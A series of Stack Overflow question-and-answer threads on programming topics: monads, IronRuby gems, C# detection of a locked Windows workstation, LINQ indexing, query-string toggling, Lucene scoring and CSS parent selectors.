Basically, the warm and fuzzy concept that I got from the article was the concept that monads are basically adapters that allow disparate functions to work in a composable fashion, i.e. be able to string up multiple functions and mix and match them without worrying about inconsistent return types and such. So the BIND function is in charge of keeping apples with apples and oranges with oranges when we're trying to make these adapters. And the LIFT function is in charge of taking "lower level" functions and "upgrading" them to work with BIND functions and be composable as well.
I hope I got it right, and more importantly, hope that the article has a valid view on monads. If nothing else, this article helped whet my appetite for learning more about monads.
A: http://mikehadlow.blogspot.com/2011/02/monads-in-c-8-video-of-my-ddd9-monad.html
This is the video you are looking for.
Demonstrating in C# what the problem is with composition and aligning the types, and then implementing them properly in C#.
Towards the end he displays how the same C# code looks in F# and finally in Haskell.
A: Mathematial thinking
For short: An Algebraic Structure for Combining Computations.
return data: create a computation who just simply generate a data in monad world.
(return data) >>= (return func): The second parameter accept first parameter as a data generator and create a new computations which concatenate them.
You can think that (>>=) and return won't do any computation itself. They just simply combine and create computations.
Any monad computation will be compute if and only if main trigs it.
A: In the Coursera "Principles of Reactive Programming" training - Erik Meier describes them as:
"Monads are return types that guide you through the happy path." -Erik Meijer
A: According to What we talk about when we talk about monads the question "What is a monad" is wrong:
The short answer to the question "What is a monad?" is that it is a monoid in the category of endofunctors or that it is a generic data type equipped with two operations that satisfy certain laws. This is correct, but it does not reveal an important bigger picture. This is because the question is wrong. In this paper, we aim to answer the right question, which is "What do authors really say when they talk about monads?"
While that paper does not directly answer what a monad is it helps understanding what people with different backgrounds mean when they talk about monads and why.
A: If you are asking for a succinct, practical explanation for something so abstract, then you can only hope for an abstract answer:
a -> b
is one way of representing a computation from as to bs. You can chain computations, aka compose them together:
(b -> c) -> (a -> b) -> (a -> c)
More complex computations demand more complex types, e.g.:
a -> f b
is the type of computations from as to bs that are into fs. You can also compose them:
(b -> f c) -> (a -> f b) -> (a -> f c)
It turns out this pattern appears literally everywhere and has the same properties as the first composition above (associativity, right- and left-identity).
One had to give this pattern a name, but then would it help to know that the first composition is formally characterised as a Semigroupoid?
"Monads are just as interesting and important as parentheses" (Oleg Kiselyov)
A: A Monad is a box with a special machine attached that allows you to make one normal box out of two nested boxes - but still retaining some of the shape of both boxes.
Concretely, it allows you to perform join, of type Monad m => m (m a) -> m a.
It also needs a return action, which just wraps a value. return :: Monad m => a -> m a
You could also say join unboxes and return wraps - but join is not of type Monad m => m a -> a (It doesn't unwrap all Monads, it unwraps Monads with Monads inside of them.)
So it takes a Monad box (Monad m =>, m) with a box inside it ((m a)) and makes a normal box (m a).
However, usually a Monad is used in terms of the (>>=) (spoken "bind") operator, which is essentially just fmap and join after each other. Concretely,
x >>= f = join (fmap f x)
(>>=) :: Monad m => (a -> m b) -> m a -> m b
Note here that the function comes in the second argument, as opposed to fmap.
Also, join = (>>= id).
Now why is this useful? Essentially, it allows you to make programs that string together actions, while working in some sort of framework (the Monad).
The most prominent use of Monads in Haskell is the IO Monad.
Now, IO is the type that classifies an Action in Haskell. Here, the Monad system was the only way of preserving (big fancy words):
*
*Referential Transparency
*Lazyness
*Purity
In essence, an IO action such as getLine :: IO String can't be replaced by a String, as it always has a different type. Think of IO as a sort of magical box that teleports the stuff to you.
However, still just saying that getLine :: IO String and all functions accept IO a causes mayhem as maybe the functions won't be needed. What would const "üp§" getLine do? (const discards the second argument. const a b = a.) The getLine doesn't need to be evaluated, but it's supposed to do IO! This makes the behaviour rather unpredictable - and also makes the type system less "pure", as all functions would take a and IO a values.
Enter the IO Monad.
To string to actions together, you just flatten the nested actions.
And to apply a function to the output of the IO action, the a in the IO a type, you just use (>>=).
As an example, to output an entered line (to output a line is a function which produces an IO action, matching the right argument of >>=):
getLine >>= putStrLn :: IO ()
-- putStrLn :: String -> IO ()
This can be written more intuitively with the do environment:
do line <- getLine
putStrLn line
In essence, a do block like this:
do x <- a
y <- b
z <- f x y
w <- g z
h x
k <- h z
l k w
... gets transformed into this:
a >>= \x ->
b >>= \y ->
f x y >>= \z ->
g z >>= \w ->
h x >>= \_ ->
h z >>= \k ->
l k w
There's also the >> operator for m >>= \_ -> f (when the value in the box isn't needed to make the new box in the box)
It can also be written a >> b = a >>= const b (const a b = a)
Also, the return operator is modeled after the IO-intuituion - it returns a value with minimal context, in this case no IO. Since the a in IO a represents the returned type, this is similar to something like return(a) in imperative programming languages - but it does not stop the chain of actions! f >>= return >>= g is the same as f >>= g. It's only useful when the term you return has been created earlier in the chain - see above.
Of course, there are other Monads, otherwise it wouldn't be called Monad, it'd be called somthing like "IO Control".
For example, the List Monad (Monad []) flattens by concatenating - making the (>>=) operator perform a function on all elements of a list. This can be seen as "indeterminism", where the List is the many possible values and the Monad Framework is making all the possible combinations.
For example (in GHCi):
Prelude> [1, 2, 3] >>= replicate 3 -- Simple binding
[1, 1, 1, 2, 2, 2, 3, 3, 3]
Prelude> concat (map (replicate 3) [1, 2, 3]) -- Same operation, more explicit
[1, 1, 1, 2, 2, 2, 3, 3, 3]
Prelude> [1, 2, 3] >> "uq"
"uququq"
Prelude> return 2 :: [Int]
[2]
Prelude> join [[1, 2], [3, 4]]
[1, 2, 3, 4]
because:
join a = concat a
a >>= f = join (fmap f a)
return a = [a] -- or "= (:[])"
The Maybe Monad just nullifies all results to Nothing if that ever occurs.
That is, binding auto-checks if the function (a >>= f) returns or the value (a >>= f) is Nothing - and then returns Nothing as well.
join Nothing = Nothing
join (Just Nothing) = Nothing
join (Just x) = x
a >>= f = join (fmap f a)
or, more explicitly:
Nothing >>= _ = Nothing
(Just x) >>= f = f x
The State Monad is for functions that also modify some shared state - s -> (a, s), so the argument of >>= is :: a -> s -> (a, s).
The name is a sort of misnomer, since State really is for state-modifying functions, not for the state - the state itself really has no interesting properties, it just gets changed.
For example:
pop :: [a] -> (a , [a])
pop (h:t) = (h, t)
sPop = state pop -- The module for State exports no State constructor,
-- only a state function
push :: a -> [a] -> ((), [a])
push x l = ((), x : l)
sPush = state push
swap = do a <- sPop
b <- sPop
sPush a
sPush b
get2 = do a <- sPop
b <- sPop
return (a, b)
getswapped = do swap
get2
then:
Main*> runState swap [1, 2, 3]
((), [2, 1, 3])
Main*> runState get2 [1, 2, 3]
((1, 2), [1, 2, 3]
Main*> runState (swap >> get2) [1, 2, 3]
((2, 1), [2, 1, 3])
Main*> runState getswapped [1, 2, 3]
((2, 1), [2, 1, 3])
also:
Prelude> runState (return 0) 1
(0, 1)
A: For people coming from the imperative background (c# specifically),
consider the following code
bool ReturnTrueorFalse(SomeObject input)
{
if(input.Property1 is invalid)
{
return false;
}
if(input.Property2 is invalid)
{
return false;
}
DoSomething();
return true;
}
You would have seen lots of code like this, you would have even seen no early returns but all the checks are done nested. Now, Monad is a pattern where this can be flattened like below
Monad<bool> ReturnTrueorFalse(SomeObject input) =>
from isProperty1Valid in input.Property1
from isProperty2Valid in input.Property2
select Monad.Create(isProperty1Valid && isProperty2Valid);
There are a few things to note here. First, the function's return value is changed. Second, both the properties of input have to be Monad. Next, Monad should implement SelectMany(LINQ's flattening operator). Since SelectMany is implemented for that type, the statements can be written using the query syntax
So, what is a Monad? It is a structure that flattens expressions that return the same type in a composable way. This is particularly useful in functional programming because most functional applications tend to keep the state and IO at the edge layer of the application (eg: Controllers) and return Monad based return values throughout the call stack until the value is required to be unwrapped. The biggest plus for me when I first saw this was it was so easy on the eyes as it was so declarative.
The best example of a Monad that every c# (these days almost everyone) developer can immediately recognize is async/await. Before.Net4.5 we had to write Task-based statements using ContinueWith for handling callbacks, after async/await we started using synchronous syntax for asynchronous syntax. This is possible because Task is a "monad".
Refer to this for a detailed explanation, this for simple implementation and language-ext for lots of awesome Monads and tons of information about functional programming in general for an OOP developer
A: Explanation
It's quite simple, when explained in C#/Java terms:
*
*A monad is a function that takes arguments and returns a special type.
*The special type that this monad returns is also called monad. (A monad is a combination of #1 and #2)
*There's some syntactic sugar to make calling this function and conversion of types easier.
Example
A monad is useful to make the life of the functional programmer easier. The typical example: The Maybe monad takes two parameters, a value and a function. It returns null if the passed value is null. Otherwise it evaluates the function. If we needed a special return type, we would call this return type Maybe as well. A very crude implementation would look like this:
object Maybe(object value, Func<object,object> function)
{
if(value==null)
return null;
return function(value);
}
This is spectacularly useless in C# because this language lacks the required syntactic sugar to make monads useful. But monads allow you to write more concise code in functional programming languages.
Oftentimes programmers call monads in chains, like so:
var x = Maybe(x, x2 => Maybe(y, y2 => Add(x2, y2)));
In this example the Add method would only be called if x and y are both non-null, otherwise null will be returned.
Answer
To answer the original question: A monad is a function AND a type. Like an implementation of a special interface.
A: following your brief, succinct, practical indications:
The easiest way to understand a monad is as a way to apply/compose functions within a context. Let's say you have two computations which both can be seen as two mathematical functions f and g.
*
*f takes a String and produces another String (take the first two letters)
*g takes a String and produces another String (upper case transformation)
So in any language the transformation "take the first two letter and convert them to upper case" would be written g(f("some string")). So, in the world of pure perfect functions, composition is just: do one thing and then do the other.
But let's say we live in the world of functions which can fail. For example: the input string might be one char long so f would fail. So in this case
*
*f takes a String and produces a String or Nothing.
*g produces a String only if f hasn't failed. Otherwise, produces Nothing
So now, g(f("some string")) needs some extra checking: "Compute f, if it fails then g should return Nothing, else compute g"
This idea can be applied to any parametrized type as follows:
Let Context[Sometype] be a computation of Sometype within a Context. Considering functions
*
*f:: AnyType -> Context[Sometype]
*g:: Sometype -> Context[AnyOtherType]
the composition g(f()) should be readed as "compute f. Within this context do some extra computations and then compute g if it has sense within the context"
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44965",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1660"
} |
Q: Can I run rubygems in ironruby? Is it currently possible with pre release of ironruby to run rubygems? It seems as if I have to set an environment variable to find them?
A: You've been able to run rubygems under IronRuby for quite a while now. Simply download and install the latest IronRuby from codeplex, and run igem on the command line
Original Answer:
I'm on that mailing list - to save you the digging, someone asked this a few weeks ago, and this was the answer
The answer (at this point) is no, you can't, but it doesn't seem like it'll be too far away.
PS: listen to curt. He's on the core team for ironruby. <3
A: if you set ENV['GEM_PATH'] correctly before using rubygems, then gems will work sometimes under IronRuby. I'm actually looking at fixing this right now.
Also, this kind of question is probably better suited for the IronRuby mailing list than it is for StackOverflow.
A: with IronRuby 1.0 Alpha 2. You should able to get igem.bat out of the box. According to Jim Deville on Nov 19 2008
Announcing the release of IronRuby 1.0 Alpha 2. You can download it on RubyForge (http://rubyforge.org/frs/?group_id=4359), I will have a tag in SVN soon. Notable features: the inclusion of iirb.bat, igem.bat, irails.bat, irake.bat! This is our first standalone release. Two caveats: If you want caller to work correctly, use -X:Interpret. If you want Rubygems to work, ensure that all of your sources end with a /. You can check in ~/.gemrc
Since then, We're now have official site with daily build. You can find at http://www.ironruby.net/Download
After than,
Set GEM_PATH to your \lib\ruby\gems\1.8 directory, e.g. c:\ruby\lib\ruby\gems\1.8
c:\> set GEM_PATH=c:\ruby\lib\ruby\gems\1.8
Test with
c:\> igem.bat
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44973",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Programmatically Determine a Duration of a Locked Workstation? How can one determine, in code, how long the machine is locked?
Other ideas outside of C# are also welcome.
I like the windows service idea (and have accepted it) for simplicity and cleanliness, but unfortunately I don't think it will work for me in this particular case. I wanted to run this on my workstation at work rather than home (or in addition to home, I suppose), but it's locked down pretty hard courtesy of the DoD. That's part of the reason I'm rolling my own, actually.
I'll write it up anyway and see if it works. Thanks everyone!
A: I know this is an old question but i have found a method to get the Lock State for a given session.
I found my answer here but it was in C++ so i translated as much as i can to C# to get the Lock State.
So here goes:
static class SessionInfo {
private const Int32 FALSE = 0;
private static readonly IntPtr WTS_CURRENT_SERVER = IntPtr.Zero;
private const Int32 WTS_SESSIONSTATE_LOCK = 0;
private const Int32 WTS_SESSIONSTATE_UNLOCK = 1;
private static bool _is_win7 = false;
static SessionInfo() {
var os_version = Environment.OSVersion;
_is_win7 = (os_version.Platform == PlatformID.Win32NT && os_version.Version.Major == 6 && os_version.Version.Minor == 1);
}
[DllImport("wtsapi32.dll")]
private static extern Int32 WTSQuerySessionInformation(
IntPtr hServer,
[MarshalAs(UnmanagedType.U4)] UInt32 SessionId,
[MarshalAs(UnmanagedType.U4)] WTS_INFO_CLASS WTSInfoClass,
out IntPtr ppBuffer,
[MarshalAs(UnmanagedType.U4)] out UInt32 pBytesReturned
);
[DllImport("wtsapi32.dll")]
private static extern void WTSFreeMemoryEx(
WTS_TYPE_CLASS WTSTypeClass,
IntPtr pMemory,
UInt32 NumberOfEntries
);
private enum WTS_INFO_CLASS {
WTSInitialProgram = 0,
WTSApplicationName = 1,
WTSWorkingDirectory = 2,
WTSOEMId = 3,
WTSSessionId = 4,
WTSUserName = 5,
WTSWinStationName = 6,
WTSDomainName = 7,
WTSConnectState = 8,
WTSClientBuildNumber = 9,
WTSClientName = 10,
WTSClientDirectory = 11,
WTSClientProductId = 12,
WTSClientHardwareId = 13,
WTSClientAddress = 14,
WTSClientDisplay = 15,
WTSClientProtocolType = 16,
WTSIdleTime = 17,
WTSLogonTime = 18,
WTSIncomingBytes = 19,
WTSOutgoingBytes = 20,
WTSIncomingFrames = 21,
WTSOutgoingFrames = 22,
WTSClientInfo = 23,
WTSSessionInfo = 24,
WTSSessionInfoEx = 25,
WTSConfigInfo = 26,
WTSValidationInfo = 27,
WTSSessionAddressV4 = 28,
WTSIsRemoteSession = 29
}
private enum WTS_TYPE_CLASS {
WTSTypeProcessInfoLevel0,
WTSTypeProcessInfoLevel1,
WTSTypeSessionInfoLevel1
}
public enum WTS_CONNECTSTATE_CLASS {
WTSActive,
WTSConnected,
WTSConnectQuery,
WTSShadow,
WTSDisconnected,
WTSIdle,
WTSListen,
WTSReset,
WTSDown,
WTSInit
}
public enum LockState {
Unknown,
Locked,
Unlocked
}
[StructLayout(LayoutKind.Sequential)]
private struct WTSINFOEX {
public UInt32 Level;
public UInt32 Reserved; /* I have observed the Data field is pushed down by 4 bytes so i have added this field as padding. */
public WTSINFOEX_LEVEL Data;
}
[StructLayout(LayoutKind.Sequential)]
private struct WTSINFOEX_LEVEL {
public WTSINFOEX_LEVEL1 WTSInfoExLevel1;
}
[StructLayout(LayoutKind.Sequential)]
private struct WTSINFOEX_LEVEL1 {
public UInt32 SessionId;
public WTS_CONNECTSTATE_CLASS SessionState;
public Int32 SessionFlags;
/* I can't figure out what the rest of the struct should look like but as i don't need anything past the SessionFlags i'm not going to. */
}
public static LockState GetSessionLockState(UInt32 session_id) {
IntPtr ppBuffer;
UInt32 pBytesReturned;
Int32 result = WTSQuerySessionInformation(
WTS_CURRENT_SERVER,
session_id,
WTS_INFO_CLASS.WTSSessionInfoEx,
out ppBuffer,
out pBytesReturned
);
if (result == FALSE)
return LockState.Unknown;
var session_info_ex = Marshal.PtrToStructure<WTSINFOEX>(ppBuffer);
if (session_info_ex.Level != 1)
return LockState.Unknown;
var lock_state = session_info_ex.Data.WTSInfoExLevel1.SessionFlags;
WTSFreeMemoryEx(WTS_TYPE_CLASS.WTSTypeSessionInfoLevel1, ppBuffer, pBytesReturned);
if (_is_win7) {
/* Ref: https://msdn.microsoft.com/en-us/library/windows/desktop/ee621019(v=vs.85).aspx
* Windows Server 2008 R2 and Windows 7: Due to a code defect, the usage of the WTS_SESSIONSTATE_LOCK
* and WTS_SESSIONSTATE_UNLOCK flags is reversed. That is, WTS_SESSIONSTATE_LOCK indicates that the
* session is unlocked, and WTS_SESSIONSTATE_UNLOCK indicates the session is locked.
* */
switch (lock_state) {
case WTS_SESSIONSTATE_LOCK:
return LockState.Unlocked;
case WTS_SESSIONSTATE_UNLOCK:
return LockState.Locked;
default:
return LockState.Unknown;
}
}
else {
switch (lock_state) {
case WTS_SESSIONSTATE_LOCK:
return LockState.Locked;
case WTS_SESSIONSTATE_UNLOCK:
return LockState.Unlocked;
default:
return LockState.Unknown;
}
}
}
}
Note: The above code was extracted from a much larger project so if i missed a bit sorry. I havn't got time to test the above code but plan to come back in a week or two to check everything. I only posted it now because i didn't want to forget to do it.
A: NOTE: This is not an answer, but a (contribution) to Timothy Carter answer, because my reputation doesn't allow me to comment so far.
Just in case somebody tried the code from Timothy Carter's answer and did not get it to work right away in a Windows service, there's one property that need to be set to true in the constructor of the service.
Just add the line in the constructor:
CanHandleSessionChangeEvent = true;
And be sure not to set this property after the service is started otherwise an InvalidOperationException will be thrown.
A: If you're interested in writing a windows-service to "find" these events, topshelf (the library/framework that makes writing windows services much easier) has a hook.
public interface IMyServiceContract
{
void Start();
void Stop();
void SessionChanged(Topshelf.SessionChangedArguments args);
}
public class MyService : IMyServiceContract
{
public void Start()
{
}
public void Stop()
{
}
public void SessionChanged(SessionChangedArguments e)
{
Console.WriteLine(e.ReasonCode);
}
}
and now the code to wire up the topshelf service to the interface/concrete above
Everything below is "typical" topshelf setup.... except for 2 lines which I marked as
/* THIS IS MAGIC LINE */
Those are what get the SessionChanged method to fire.
I tested this with windows 10 x64. I locked and unlocked my machine and I got the desired result.
IMyServiceContract myServiceObject = new MyService(); /* container.Resolve<IMyServiceContract>(); */
HostFactory.Run(x =>
{
x.Service<IMyServiceContract>(s =>
{
s.ConstructUsing(name => myServiceObject);
s.WhenStarted(sw => sw.Start());
s.WhenStopped(sw => sw.Stop());
s.WhenSessionChanged((csm, hc, chg) => csm.SessionChanged(chg)); /* THIS IS MAGIC LINE */
});
x.EnableSessionChanged(); /* THIS IS MAGIC LINE */
/* use command line variables for the below commented out properties */
/*
x.RunAsLocalService();
x.SetDescription("My Description");
x.SetDisplayName("My Display Name");
x.SetServiceName("My Service Name");
x.SetInstanceName("My Instance");
*/
x.StartManually(); // Start the service manually. This allows the identity to be tweaked before the service actually starts
/* the below map to the "Recover" tab on the properties of the Windows Service in Control Panel */
x.EnableServiceRecovery(r =>
{
r.OnCrashOnly();
r.RestartService(1); ////first
r.RestartService(1); ////second
r.RestartService(1); ////subsequents
r.SetResetPeriod(0);
});
x.DependsOnEventLog(); // Windows Event Log
x.UseLog4Net();
x.EnableShutdown();
x.OnException(ex =>
{
/* Log the exception */
/* not seen, I have a log4net logger here */
});
});
My packages.config to provide hints about versions:
<package id="log4net" version="2.0.5" targetFramework="net45" />
<package id="Topshelf" version="4.0.3" targetFramework="net461" />
<package id="Topshelf.Log4Net" version="4.0.3" targetFramework="net461" />
A: I would create a Windows Service (a visual studio 2005 project type) that handles the OnSessionChange event as shown below:
protected override void OnSessionChange(SessionChangeDescription changeDescription)
{
if (changeDescription.Reason == SessionChangeReason.SessionLock)
{
//I left my desk
}
else if (changeDescription.Reason == SessionChangeReason.SessionUnlock)
{
//I returned to my desk
}
}
What and how you log the activity at that point is up to you, but a Windows Service provides quick and easy access to windows events like startup, shutdown, login/out, along with the lock and unlock events.
A: The solution below uses the Win32 API. OnSessionLock is called when the workstation is locked, and OnSessionUnlock is called when it is unlocked.
[DllImport("wtsapi32.dll")]
private static extern bool WTSRegisterSessionNotification(IntPtr hWnd,
int dwFlags);
[DllImport("wtsapi32.dll")]
private static extern bool WTSUnRegisterSessionNotification(IntPtr
hWnd);
private const int NotifyForThisSession = 0; // This session only
private const int SessionChangeMessage = 0x02B1;
private const int SessionLockParam = 0x7;
private const int SessionUnlockParam = 0x8;
protected override void WndProc(ref Message m)
{
// check for session change notifications
if (m.Msg == SessionChangeMessage)
{
if (m.WParam.ToInt32() == SessionLockParam)
OnSessionLock(); // Do something when locked
else if (m.WParam.ToInt32() == SessionUnlockParam)
OnSessionUnlock(); // Do something when unlocked
}
base.WndProc(ref m);
return;
}
void OnSessionLock()
{
Debug.WriteLine("Locked...");
}
void OnSessionUnlock()
{
Debug.WriteLine("Unlocked...");
}
private void Form1Load(object sender, EventArgs e)
{
WTSRegisterSessionNotification(this.Handle, NotifyForThisSession);
}
// and then when we are done, we should unregister for the notification
// WTSUnRegisterSessionNotification(this.Handle);
A: I hadn't found this before, but from any application you can hookup a SessionSwitchEventHandler. Obviously your application will need to be running, but so long as it is:
Microsoft.Win32.SystemEvents.SessionSwitch += new Microsoft.Win32.SessionSwitchEventHandler(SystemEvents_SessionSwitch);
void SystemEvents_SessionSwitch(object sender, Microsoft.Win32.SessionSwitchEventArgs e)
{
if (e.Reason == SessionSwitchReason.SessionLock)
{
//I left my desk
}
else if (e.Reason == SessionSwitchReason.SessionUnlock)
{
//I returned to my desk
}
}
A: In Windows Task Scheduler, you could create tasks that trigger on workstation lock and on workstation unlock. Each task could write a flag and timestamp to a file to state if the workstation is locked or unlocked and when it happened.
I realize that this is not a programmatic way. It is simpler than writing a service. It won't miss an event because your program happens to not be running at the time of lock/unlock transition.
A: Below is the 100% working code to find if the PC is locked or not.
Before using this use the namespace System.Runtime.InteropServices.
[DllImport("user32", EntryPoint = "OpenDesktopA", CharSet = CharSet.Ansi,SetLastError = true, ExactSpelling = true)]
private static extern Int32 OpenDesktop(string lpszDesktop, Int32 dwFlags, bool fInherit, Int32 dwDesiredAccess);
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
private static extern Int32 CloseDesktop(Int32 hDesktop);
[DllImport("user32", CharSet = CharSet.Ansi,SetLastError = true,ExactSpelling = true)]
private static extern Int32 SwitchDesktop(Int32 hDesktop);
public static bool IsWorkstationLocked()
{
const int DESKTOP_SWITCHDESKTOP = 256;
int hwnd = -1;
int rtn = -1;
hwnd = OpenDesktop("Default", 0, false, DESKTOP_SWITCHDESKTOP);
if (hwnd != 0)
{
rtn = SwitchDesktop(hwnd);
if (rtn == 0)
{
// Locked
CloseDesktop(hwnd);
return true;
}
else
{
// Not locked
CloseDesktop(hwnd);
}
}
else
{
// Error: "Could not access the desktop..."
}
return false;
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44980",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "114"
} |
Q: How do you index into a var in LINQ? I'm trying to get the following bit of code to work in LINQPad but am unable to index into a var. Anybody know how to index into a var in LINQ?
string[] sa = {"one", "two", "three"};
sa[1].Dump();
var va = sa.Select( (a,i) => new {Line = a, Index = i});
va[1].Dump();
// Cannot apply indexing with [] to an expression of type 'System.Collections.Generic.IEnumerable<AnonymousType#1>'
A: You can't apply an index to a var unless it's an indexable type:
//works because under the hood the C# compiler has converted var to string[]
var arrayVar = {"one", "two", "three"};
arrayVar[1].Dump();
//now let's try
var selectVar = arrayVar.Select( (a,i) => new { Line = a });
//or this (I find this syntax easier, but either works)
var selectVar =
from s in arrayVar
select new { Line = s };
In both these cases selectVar is actually IEnumerable<'a> - not an indexed type. You can easily convert it to one though:
//convert it to a List<'a>
var aList = selectVar.ToList();
//convert it to a 'a[]
var anArray = selectVar.ToArray();
//or even a Dictionary<string,'a>
var aDictionary = selectVar.ToDictionary( x => x.Line );
A: As the comment says, you cannot apply indexing with [] to an expression of type System.Collections.Generic.IEnumerable<T>. The IEnumerable interface only supports the method GetEnumerator(). However with LINQ you can call the extension method ElementAt(int).
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44989",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "10"
} |
Q: reassign value to query string parameter I have a "showall" query string parameter in the url, the parameter is being added dynamically when "Show All/Show Pages" button is clicked.
I want the ability to toggle "showall" query string parameter value depending on user clicking the "Show All/Show Pages" button.
I'm doing some nested "if's" and string.Replace() on the url, is there a better way?
All manipulations are done on the server.
p.s. Toran, good suggestion, however I HAVE TO USE URL PARAMETER due to some other issues.
A: Just to elaborate on Toran's answer:
Use:
<asp:HiddenField ID="ShowAll" Value="False" runat="server" />
To toggle your state:
protected void ToggleState(object sender, EventArgs e)
{
//parse string as boolean, invert, and convert back to string
ShowAll.Value = (!Boolean.Parse(ShowAll.Value)).ToString();
}
A: Another dirty alternative could be just to use a hidden input and set that on/off instead of manipulating the url.
A: Would it be too much of an effort just to have the value hard-coded into the URL (I know it's not too nice) with a default value or true then just have
booleanVar = !booleanVar;
run on every page load?
At least that would move away from the need of having nested ifs to manipulate the URL.
A: I am not sure based upon the question, but isn't this where HTTPHandlers come to the rescue? Shouldn't you be handling the variable alteration on the object prior to page rendering in this case then?
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44999",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: In Lucene how do terms get used in calculating scores, can I override it with a CustomScoreQuery? Has someone successfully overridden the scoring of documents in a query so that the "relevancy" of a term to the field contents can be determined through one's own function? If so, was it by implementing a CustomScoreQuery and overriding the customScore(int, float, float)? I cannot seem to find a way to build either a custom sort or a custom scorer that can rank exact term matches much higher than other prefix term matches. Any suggestions would be appreciated.
A: I don't know lucene directly, but I can tell you that Solr, an application based on lucene, has got this feature:
Boosting query via functions
Let me know if it helps you.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45002",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Complex CSS selector for parent of active child Is there a way to select a parent element based on the class of a child element in the class? The example that is relevant to me relating to HTML output by a nice menu plugin for http://drupal.org. The output renders like this:
<ul class="menu">
<li>
<a class="active">Active Page</a>
</li>
<li>
<a>Some Other Page</a>
</li>
</ul>
My question is whether or not it is possible to apply a style to the list item that contains the anchor with the active class on it. Obviously, I'd prefer that the list item be marked as active, but I don't have control of the code that gets produced. I could perform this sort of thing using javascript (JQuery springs to mind), but I was wondering if there is a way to do this using CSS selectors.
Just to be clear, I want to apply a style to the list item, not the anchor.
A: Late to the party again but for what it's worth it is possible using jQuery to be a little more succinct. In my case I needed to find the <ul> parent tag for a <span> tag contained in the child <li>. jQuery has the :has selector so it's possible to identify a parent by the children it contains (updated per @Afrowave's comment ref: https://api.jquery.com/has-selector/):
$("ul").has("#someId")
will select the ul element that has a child element with id someId. Or to answer the original question, something like the following should do the trick (untested):
$("li").has(".active")
A: THE “PARENT” SELECTOR
Right now, there is no option to select the parent of an element in CSS (not even CSS3). But with CSS4, the most important news in the current W3C draft is the support for the parent selector.
$ul li:hover{
background: #fff;
}
Using the above, when hovering an list element, the whole unordered list will be highlighted by adding a white background to it.
Official documentation: https://www.w3.org/TR/2011/WD-selectors4-20110929/#overview (last row).
A: According to Wikipedia:
Selectors are unable to ascend
CSS offers no way to select a parent or ancestor of element that satisfies certain criteria. A more advanced selector scheme (such as XPath) would enable more sophisticated stylesheets. However, the major reasons for the CSS Working Group rejecting proposals for parent selectors are related to browser performance and incremental rendering issues.
And for anyone searching SO in future, this might also be referred to as an ancestor selector.
Update:
The Selectors Level 4 Spec allows you to select which part of the select is the subject:
The subject of the selector can be explicitly identified by prepending
a dollar sign ($) to one of the compound selectors in a selector.
Although the element structure that the selector represents is the
same with or without the dollar sign, indicating the subject in this
way can change which compound selector represents the subject in that
structure.
Example 1:
For example, the following selector represents a list item LI unique child of
an ordered list OL:
OL > LI:only-child
However the following one represents an ordered list OL having a unique child,
that child being a LI:
$OL > LI:only-child
The structures represented by these two selectors are the same,
but the subjects of the selectors are not.
Although this isn't available (currently, November 2011) in any browser or as a selector in jQuery.
A: I had the same problem with Drupal. Given the limitations of CSS, the way to get this working is to add the "active" class to the parent elements when the menu HTML is generated. There's a good discussion of this at http://drupal.org/node/219804, the upshot of which is that this functionality has been rolled in to version 6.x-2.x of the nicemenus module. As this is still in development, I've backported the patch to 6.x-1.3 at http://drupal.org/node/465738 so that I can continue to use the production-ready version of the module.
A: I actually ran into the same issue as the original poster. There is a simple solution of just using .parent() jQuery selector. My problem was, I was using .parent instead of .parent(). Stupid mistake I know.
Bind the events (in this case since my tabs are in Modal I needed to bind them with .live instead of a basic .click.
$('#testTab1 .tabLink').live('click', function() {
$('#modal ul.tabs li').removeClass("current"); //Remove any "current" class
$(this).parent().addClass("current"); //Add "current" class to selected tab
$('#modal div#testTab1 .tabContent').hide();
$(this).next('.tabContent').fadeIn();
return false;
})
$('#testTab2 .tabLink').live('click', function() {
$('#modal ul.tabs li').removeClass("current"); //Remove any "current" class
$(this).parent().addClass("current"); //Add "current" class to selected tab
$('#modal div#testTab2 .tabContent').hide();
$(this).next('.tabContent').fadeIn();
return false;
})
Here is the HTML..
<div id="tabView1" style="display:none;">
<!-- start: the code for tabView 1 -->
<div id="testTab1" style="width:1080px; height:640px; position:relative;">
<h1 class="Bold_Gray_45px">Modal Header</h1>
<div class="tabBleed"></div>
<ul class="tabs">
<li class="current"> <a href="#" class="tabLink" id="link1">Tab Title Link</a>
<div class="tabContent" id="tabContent1-1">
<div class="modalCol">
<p>Your Tab Content</p>
<p><a href="#" class="tabShopLink">tabBased Anchor Link</a> </p>
</div>
<div class="tabsImg"> </div>
</div>
</li>
<li> <a href="#" class="tabLink" id="link2">Tab Title Link</a>
<div class="tabContent" id="tabContent1-2">
<div class="modalCol">
<p>Your Tab Content</p>
<p><a href="#" class="tabShopLink">tabBased Anchor Link</a> </p>
</div>
<div class="tabsImg"> </div>
</div>
</li>
</ul>
</div>
</div>
Of course you can repeat that pattern..with more LI's
A: Many people answered with jQuery parent, but just to add on to that I wanted to share a quick snippet of code that I use for adding classes to my navs so I can add styling to li's that only have sub-menus and not li's that don't.
$("li ul").parent().addClass('has-sub');
A: You can use has():
li:has(a:active) {
/* ... */
}
Unfortunately, there's no way to do that with CSS.
It's not very difficult with JavaScript though:
// JavaScript code:
document.getElementsByClassName("active")[0].parentNode;
// jQuery code:
$('.active').parent().get(0); // This would be the <a>'s parent <li>.
A: The first draft of Selectors Level 4 outlines a way to explicitly set the subject of a selector. This would allow the OP to style the list element with the selector $li > a.active
From Determining the Subject of a Selector:
For example, the following selector represents a list item LI unique child of an ordered list OL:
OL > LI:only-child
However the following one represents an ordered list OL having a unique child, that child being a LI:
$OL > LI:only-child
The structures represented by these two selectors are the same, but the subjects of the selectors are not.
